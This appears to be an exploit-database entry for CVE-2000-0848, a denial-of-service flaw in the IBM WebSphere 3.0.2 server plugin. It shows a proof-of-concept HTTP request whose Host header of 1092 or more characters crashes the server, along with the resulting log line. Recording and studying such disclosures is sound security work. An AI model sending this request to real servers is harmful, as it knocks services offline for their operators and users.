[] NeoSense

IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service

Author: Rude Yak
type: dos
platform: multiple
port: 
date_added: 2000-09-15 
date_updated: 2012-08-04 
verified: 1 
codes: CVE-2000-0848;OSVDB-1561 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/1691/info

Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS).

GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)

resulted in the following IBMHTTPD log entry:

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)